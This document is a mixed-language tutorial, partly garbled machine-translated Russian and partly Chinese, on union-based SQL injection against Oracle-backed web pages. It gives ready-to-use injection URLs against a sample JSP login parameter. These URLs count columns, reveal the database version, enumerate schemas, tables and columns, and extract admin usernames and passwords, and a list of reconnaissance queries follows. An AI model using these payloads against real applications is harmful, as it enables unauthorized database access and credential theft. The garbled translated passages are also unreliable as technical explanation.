Oracle обычный комбинированный впрыск
Oracle Database, также известный как СУБД Oracle, или просто Oracle. Oracle является реляционной системы управления базами данных.
Oracle для MYSQL, MSSQL это означает, что большее количество данных, больше полномочий.
оракул вводил в маленькой точке, чтобы отметить:
- Oracle запрос в использовании союза с Mysql Mysql не то же самое , которое я буду иметь возможность использовать заполнитель 1,2,3,4, а в Oracle существуют более строгие требования типа. Что вы
union selectхотели быть в передней части поля и типа, мы можем использовать нуль вместо станции.- Oracle и MySQL не то же самое, что нет никаких ограничений на вкладке, но использование трех вложенных запросов способом постраничной (первые данные запроса «> = 0 <= 1»), например:
SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (select * from session_roles) A WHERE ROWNUM <= 1 ) WHERE RN >= 0
3. Oracle комментарий символ однострочный -, многострочный комментарий символов / ** /.
Тем не менее представить порядок угадать текущую страницу, используемую в SQL запросов несколько полей, то есть, чтобы подтвердить номер поля запросов.
Http: // www.jsporcle.com/a.jsp?username=SMITH%27%20order%20by%208%20--
Http: // www.jsporcle.com/a.jsp?username=SMITH%27%20union%20select%20null,null,null,null,null,null,null,null%20from%20dual%20--
версия базы данных взрыва
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null from dual --
其他查询信息语句:
1 当前用户权限 (select * from session_roles) 2 当前数据库版本 ( select banner from sys.v_$version where rownum=1) 3 服务器出口IP (用utl_http.request 可以实现) 4 服务器监听IP (select utl_inaddr.get_host_address from dual) 5 服务器操作系统 (select member from v$logfile where rownum=1) 6 服务器sid (select instance_name from v$instance) 7 当前连接用户 (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual) 8 当前用户 (SELECT user FROM dual)
爆库名:
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select owner from all_tables where rownum=1),null,null,null,null,null from dual --
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select owner from all_tables where rownum=1 and owner <>'SYS' ),null,null,null,null,null from dual --
爆表:
表 一定要是大写的
查询第一个表
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,null,(select table_name from user_tables where rownum=1),null,null,null,null,null from dual --
爆列
查询 表 ADMIN第一个列
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and rownum=1),null,null,null,null,null,null from dual --
第二个列
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and rownum=1),null,null,null,null,null,null from dual --
查询表ADMIN 第三个列
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and column_name<>'USERNAME' and rownum=1),null,null,null,null,null,null from dual --
查询出来列有ID USERNAME PASSWORD
爆数据
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(SELECT CONCAT(USERNAME,PASSWORD) FROM ADMIN),null,null,null,null,null,null from dual --
http://www.jsporcle.com/a.jsp?username=SMITH' union select null,(SELECT USERNAME FROM ADMIN),(SELECT PASSWORD FROM ADMIN),null,null,null,null,null from dual --
一些常用的查询语句:
当前用户: SELECT user FROM dual; 列出所有用户: SELECT username FROM all_users ORDER BY username; 列出数据库 SELECT DISTINCT owner FROM all_tables; 列出表名: SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; 查询表所有列 SELECT column_name FROM all_tab_columns WHERE TABLE_NAME='ADMIN'; 定位文件 SELECT name FROM V$DATAFILE;